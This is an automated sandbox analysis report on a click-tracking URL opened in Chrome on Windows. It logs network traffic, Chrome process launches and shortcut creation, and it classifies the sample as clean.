Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownHTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49962 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_7160_1979841680Jump to behavior
Source: classification engineClassification label: clean3.win@27/318@60/27
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1964,i,2291995251534009458,9676275645718360360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ctrk.klclick.com/l/01HHA7T34SH51AXCSV6CC50V39_2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6036 --field-trial-handle=1964,i,2291995251534009458,9676275645718360360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6052 --field-trial-handle=1964,i,2291995251534009458,9676275645718360360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1964,i,2291995251534009458,9676275645718360360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6036 --field-trial-handle=1964,i,2291995251534009458,9676275645718360360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6052 --field-trial-handle=1964,i,2291995251534009458,9676275645718360360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
Valid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
11
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Non-Application Layer Protocol
SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
Domain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
Application Layer Protocol
Data Encrypted for ImpactDNS ServerEmail Addresses
Local AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureTraffic Duplication1
Ingress Tool Transfer
Data DestructionVirtual Private ServerEmployee Names
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1357461 URL: https://ctrk.klclick.com/l/... Startdate: 10/12/2023 Architecture: WINDOWS Score: 3 18 cms.boringsecurity.com 2->18 6 chrome.exe 9 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 20 192.168.2.5 unknown unknown 6->20 22 239.255.255.250 unknown Reserved 6->22 11 chrome.exe 6->11         started        14 chrome.exe 6->14         started        16 chrome.exe 6 6->16         started        process5 dnsIp6 24 d319s8zqhriqme.cloudfront.net 18.66.255.33 MIT-GATEWAYSUS United States 11->24 26 cms.boringsecurity.com 23.92.19.144 LINODE-APLinodeLLCUS United States 11->26 28 28 other IPs or domains 11->28

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
